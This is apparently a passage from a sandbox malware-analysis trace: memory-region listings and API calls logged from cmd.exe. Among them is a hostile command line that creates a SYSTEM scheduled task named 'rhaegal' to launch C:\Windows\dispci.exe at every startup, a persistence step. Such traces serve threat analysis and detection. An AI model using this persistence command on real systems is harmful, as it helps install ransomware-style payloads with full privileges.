0x744a7fff entry_point = 0x744a20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 543 start_va = 0x744b0000 end_va = 0x7450bfff entry_point = 0x744ef798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 544 start_va = 0x74510000 end_va = 0x7454efff entry_point = 0x7453de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 545 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 546 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 547 start_va = 0x180000 end_va = 0x1e6fff entry_point = 0x180000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 548 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 549 start_va = 0x640000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 550 start_va = 0x74810000 end_va = 0x74816fff entry_point = 0x74811230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 551 start_va = 0x74ac0000 end_va = 0x74acbfff entry_point = 0x74ac10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 552 start_va = 0x74ad0000 end_va = 0x74b2ffff entry_point = 0x74aea3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 553 start_va = 0x74ca0000 end_va = 0x74d9ffff entry_point = 0x74cbb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 554 start_va = 0x74da0000 end_va = 0x74da9fff entry_point = 0x74da36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 555 start_va = 0x74e80000 end_va = 0x74e98fff entry_point = 0x74e84975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 556 start_va = 0x74ea0000 end_va = 0x74f3ffff entry_point = 0x74eb49e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 557 start_va = 0x75ee0000 end_va = 0x75fcffff entry_point = 0x75ef0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 558 start_va = 0x763f0000 end_va = 0x7647ffff entry_point = 0x76406343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 559 start_va = 0x76510000 end_va = 0x765acfff entry_point = 0x76543fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 560 start_va = 0x765b0000 end_va = 0x765f5fff entry_point = 0x765b7478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 561 start_va = 0x76600000 end_va = 0x7670ffff entry_point = 0x766132d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 562 start_va = 0x76a40000 end_va = 0x76aebfff entry_point = 0x76a4a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 563 start_va = 0x76b70000 end_va = 0x76c69fff entry_point = 0x0 region_type = private name = "private_0x0000000076b70000" filename = "" Region: id = 564 start_va = 0x76c70000 end_va = 0x76d8efff entry_point = 0x0 region_type = private name = "private_0x0000000076c70000" filename = "" Region: id = 565 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 566 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 567 start_va = 0x480000 end_va = 0x607fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 568 start_va = 0x74b30000 end_va = 0x74b8ffff entry_point = 0x74b4158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 569 start_va = 0x74db0000 end_va = 0x74e7bfff entry_point = 0x74db168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 570 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 571 start_va = 0xb0000 end_va = 0xb1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 572 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 573 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 574 start_va = 0x650000 end_va = 0x7d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 575 start_va = 0x7e0000 end_va = 0x1bdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 576 start_va = 0x1be0000 end_va = 0x1f22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001be0000" filename = "" Region: id = 580 start_va = 0x1f30000 end_va = 0x21fefff entry_point = 0x1f30000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 7 os_tid = 0x99c [0017.496] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x32f81c | out: lpSystemTimeAsFileTime=0x32f81c*(dwLowDateTime=0x43caf490, dwHighDateTime=0x1d34da4)) [0017.496] GetCurrentProcessId () returned 0x998 [0017.496] GetCurrentThreadId () returned 0x99c [0017.496] GetTickCount () returned 0x14191 [0017.496] QueryPerformanceCounter (in: lpPerformanceCount=0x32f814 | out: lpPerformanceCount=0x32f814*=315410551) returned 1 [0017.497] GetModuleHandleA (lpModuleName=0x0) returned 0x4a590000 [0017.498] __set_app_type (_Type=0x1) [0017.498] __p__fmode () returned 0x76ae31f4 [0017.498] __p__commode () returned 0x76ae31fc [0017.498] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5b21a6) returned 0x0 [0017.498] __getmainargs (in: _Argc=0x4a5b4238, _Argv=0x4a5b4240, _Env=0x4a5b423c, _DoWildCard=0, _StartInfo=0x4a5b4140 | out: _Argc=0x4a5b4238, _Argv=0x4a5b4240, _Env=0x4a5b423c) returned 0 [0017.498] GetCurrentThreadId () returned 0x99c [0017.498] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x99c) returned 0x60 [0017.498] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76600000 [0017.498] GetProcAddress (hModule=0x76600000, lpProcName="SetThreadUILanguage") returned 0x7662a84f [0017.498] SetThreadUILanguage (LangId=0x0) returned 0x409 [0017.516] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0017.516] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x32f7ac | out: phkResult=0x32f7ac*=0x0) returned 0x2 [0017.516] VirtualQuery (in: lpAddress=0x32f7e3, lpBuffer=0x32f77c, dwLength=0x1c | out: lpBuffer=0x32f77c*(BaseAddress=0x32f000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0017.516] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x32f77c, dwLength=0x1c | out: lpBuffer=0x32f77c*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0017.516] VirtualQuery (in: lpAddress=0x231000, lpBuffer=0x32f77c, dwLength=0x1c | out: lpBuffer=0x32f77c*(BaseAddress=0x231000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0017.516] VirtualQuery (in: lpAddress=0x233000, lpBuffer=0x32f77c, dwLength=0x1c | out: lpBuffer=0x32f77c*(BaseAddress=0x233000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0017.516] VirtualQuery (in: lpAddress=0x330000, lpBuffer=0x32f77c, dwLength=0x1c | out: lpBuffer=0x32f77c*(BaseAddress=0x330000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x50000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0017.516] GetConsoleOutputCP () returned 0x1b5 [0017.516] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a5b4260 | out: lpCPInfo=0x4a5b4260) returned 1 [0017.516] SetConsoleCtrlHandler (HandlerRoutine=0x4a5ae72a, Add=1) returned 1 [0017.516] _get_osfhandle (_FileHandle=1) returned 0x7 [0017.516] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0017.516] _get_osfhandle (_FileHandle=1) returned 0x7 [0017.516] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5b41ac | out: lpMode=0x4a5b41ac) returned 1 [0017.516] _get_osfhandle (_FileHandle=1) returned 0x7 [0017.516] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0017.517] _get_osfhandle (_FileHandle=0) returned 0x3 [0017.517] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5b41b0 | out: lpMode=0x4a5b41b0) returned 1 [0017.517] _get_osfhandle (_FileHandle=0) returned 0x3 [0017.517] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0017.517] GetEnvironmentStringsW () returned 0x392168* [0017.517] FreeEnvironmentStringsW (penv=0x392168) returned 1 [0017.517] GetEnvironmentStringsW () returned 0x392168* [0017.517] FreeEnvironmentStringsW (penv=0x392168) returned 1 [0017.517] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32e71c | out: phkResult=0x32e71c*=0x68) returned 0x0 [0017.517] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32e724, lpData=0x32e728, lpcbData=0x32e720*=0x1000 | out: lpType=0x32e724*=0x0, lpData=0x32e728*=0x0, lpcbData=0x32e720*=0x1000) returned 0x2 [0017.517] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32e724, lpData=0x32e728, lpcbData=0x32e720*=0x1000 | out: lpType=0x32e724*=0x4, lpData=0x32e728*=0x1, lpcbData=0x32e720*=0x4) returned 0x0 [0017.517] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32e724, lpData=0x32e728, lpcbData=0x32e720*=0x1000 | out: lpType=0x32e724*=0x0, lpData=0x32e728*=0x1, lpcbData=0x32e720*=0x1000) returned 0x2 [0017.517] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32e724, lpData=0x32e728, lpcbData=0x32e720*=0x1000 | out: lpType=0x32e724*=0x4, lpData=0x32e728*=0x0, lpcbData=0x32e720*=0x4) returned 0x0 [0017.518] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32e724, lpData=0x32e728, lpcbData=0x32e720*=0x1000 | out: lpType=0x32e724*=0x4, lpData=0x32e728*=0x40, lpcbData=0x32e720*=0x4) returned 0x0 [0017.518] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32e724, lpData=0x32e728, lpcbData=0x32e720*=0x1000 | out: lpType=0x32e724*=0x4, lpData=0x32e728*=0x40, lpcbData=0x32e720*=0x4) returned 0x0 [0017.518] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32e724, lpData=0x32e728, lpcbData=0x32e720*=0x1000 | out: lpType=0x32e724*=0x0, lpData=0x32e728*=0x40, lpcbData=0x32e720*=0x1000) returned 0x2 [0017.518] RegCloseKey (hKey=0x68) returned 0x0 [0017.518] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x32e71c | out: phkResult=0x32e71c*=0x68) returned 0x0 [0017.518] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x32e724, lpData=0x32e728, lpcbData=0x32e720*=0x1000 | out: lpType=0x32e724*=0x0, lpData=0x32e728*=0x40, lpcbData=0x32e720*=0x1000) returned 0x2 [0017.518] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x32e724, lpData=0x32e728, lpcbData=0x32e720*=0x1000 | out: lpType=0x32e724*=0x4, lpData=0x32e728*=0x1, lpcbData=0x32e720*=0x4) returned 0x0 [0017.518] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x32e724, lpData=0x32e728, lpcbData=0x32e720*=0x1000 | out: lpType=0x32e724*=0x0, lpData=0x32e728*=0x1, lpcbData=0x32e720*=0x1000) returned 0x2 [0017.518] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x32e724, lpData=0x32e728, lpcbData=0x32e720*=0x1000 | out: lpType=0x32e724*=0x4, lpData=0x32e728*=0x0, lpcbData=0x32e720*=0x4) returned 0x0 [0017.518] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x32e724, lpData=0x32e728, lpcbData=0x32e720*=0x1000 | out: lpType=0x32e724*=0x4, lpData=0x32e728*=0x9, lpcbData=0x32e720*=0x4) returned 0x0 [0017.518] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x32e724, lpData=0x32e728, lpcbData=0x32e720*=0x1000 | out: lpType=0x32e724*=0x4, lpData=0x32e728*=0x9, lpcbData=0x32e720*=0x4) returned 0x0 [0017.518] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x32e724, lpData=0x32e728, lpcbData=0x32e720*=0x1000 | out: lpType=0x32e724*=0x0, lpData=0x32e728*=0x9, lpcbData=0x32e720*=0x1000) returned 0x2 [0017.518] RegCloseKey (hKey=0x68) returned 0x0 [0017.518] time (in: timer=0x0 | out: timer=0x0) returned 0x59f0aadb [0017.518] srand (_Seed=0x59f0aadb) [0017.518] GetCommandLineW () returned="/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"C:\\Windows\\system32\\cmd.exe /C Start \\\"\\\" \\\"C:\\Windows\\dispci.exe\\\" -id 1550063777 && exit\"" [0017.518] GetCommandLineW () returned="/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR \"C:\\Windows\\system32\\cmd.exe /C Start \\\"\\\" \\\"C:\\Windows\\dispci.exe\\\" -id 1550063777 && exit\"" [0017.518] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a5b5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.518] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x392170, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0017.518] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a5c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0017.518] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a5c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0017.518] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a5c0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0017.518] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0017.518] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0017.519] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0017.519] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0017.519] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0017.519] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0017.519] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0017.519] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0017.519] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0017.519] GetEnvironmentStringsW () returned 0x392380* [0017.519] FreeEnvironmentStringsW (penv=0x392380) returned 1 [0017.519] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a5c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0017.519] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a5c0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0017.519] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0017.519] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0017.519] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0017.519] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0017.519] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0017.519] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0017.519] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0017.519] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0017.519] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x32f4e8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.519] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x32f4e8, lpFilePart=0x32f4e4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x32f4e4*="Desktop") returned 0x25 [0017.519] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0017.519] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x32f264 | out: lpFindFileData=0x32f264) returned 0x391fe8 [0017.519] FindClose (in: hFindFile=0x391fe8 | out: hFindFile=0x391fe8) returned 1 [0017.519] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x32f264 | out: lpFindFileData=0x32f264) returned 0x391fe8 [0017.519] FindClose (in: hFindFile=0x391fe8 | out: hFindFile=0x391fe8) returned 1 [0017.519] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0017.519] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x32f264 | out: lpFindFileData=0x32f264) returned 0x391fe8 [0017.520] FindClose (in: hFindFile=0x391fe8 | out: hFindFile=0x391fe8) returned 1 [0017.520] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0017.520] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0017.520] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0017.520] GetEnvironmentStringsW () returned 0x3941f0* [0017.520] FreeEnvironmentStringsW (penv=0x3941f0) returned 1 [0017.520] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a5b5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0017.520] GetConsoleOutputCP () returned 0x1b5 [0017.520] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a5b4260 | out: lpCPInfo=0x4a5b4260) returned 1 [0017.520] GetUserDefaultLCID () returned 0x409 [0017.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a5b4950, cchData=8 | out: lpLCData=":") returned 2 [0017.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x32f628, cchData=128 | out: lpLCData="0") returned 2 [0017.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x32f628, cchData=128 | out: lpLCData="0") returned 2 [0017.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x32f628, cchData=128 | out: lpLCData="1") returned 2 [0017.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a5b4940, cchData=8 | out: lpLCData="/") returned 2 [0017.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a5b4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0017.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a5b4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0017.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a5b4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0017.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a5b4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0017.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a5b4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0017.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a5b4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0017.521] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a5b4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0017.521] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a5b4930, cchData=8 | out: lpLCData=".") returned 2 [0017.521] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a5b4920, cchData=8 | out: lpLCData=",") returned 2 [0017.521] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0017.522] GetConsoleTitleW (in: lpConsoleTitle=0x392ec0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0017.522] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76600000 [0017.522] GetProcAddress (hModule=0x76600000, lpProcName="CopyFileExW") returned 0x76633b92 [0017.522] GetProcAddress (hModule=0x76600000, lpProcName="IsDebuggerPresent") returned 0x76614a5d [0017.522] GetProcAddress (hModule=0x76600000, lpProcName="SetConsoleInputExeNameW") returned 0x7662a79d [0017.523] _wcsicmp (_String1="schtasks", _String2=")") returned 74 [0017.523] _wcsicmp (_String1="FOR", _String2="schtasks") returned -13 [0017.523] _wcsicmp (_String1="FOR/?", _String2="schtasks") returned -13 [0017.523] _wcsicmp (_String1="IF", _String2="schtasks") returned -10 [0017.523] _wcsicmp (_String1="IF/?", _String2="schtasks") returned -10 [0017.523] _wcsicmp (_String1="REM", _String2="schtasks") returned -1 [0017.523] _wcsicmp (_String1="REM/?", _String2="schtasks") returned -1 [0017.525] GetConsoleTitleW (in: lpConsoleTitle=0x32f320, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0017.525] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0017.525] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0017.525] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0017.525] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0017.525] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0017.525] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0017.525] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0017.525] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0017.525] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0017.525] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0017.525] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0017.525] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0017.525] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0017.526] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0017.526] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0017.526] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0017.526] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0017.526] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0017.526] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0017.526] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0017.526] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0017.526] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0017.526] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0017.526] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0017.526] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0017.526] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0017.526] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0017.526] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0017.526] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0017.526] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0017.526] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0017.526] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0017.526] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0017.526] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0017.526] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0017.526] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0017.526] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0017.526] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0017.526] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0017.526] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0017.526] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0017.526] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0017.526] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0017.526] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0017.526] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0017.526] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0017.526] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0017.526] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0017.526] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0017.526] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0017.526] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0017.526] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0017.526] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0017.526] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0017.526] _wcsicmp 